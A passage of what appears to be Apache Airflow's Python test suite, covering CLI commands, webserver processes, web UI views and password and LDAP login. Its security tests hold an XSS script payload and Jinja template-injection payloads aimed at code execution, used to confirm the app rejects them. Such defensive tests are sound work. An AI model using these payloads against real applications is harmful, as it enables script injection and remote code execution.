# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In python2.7 no conversion is required back to str
# In python >= 3 the method must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
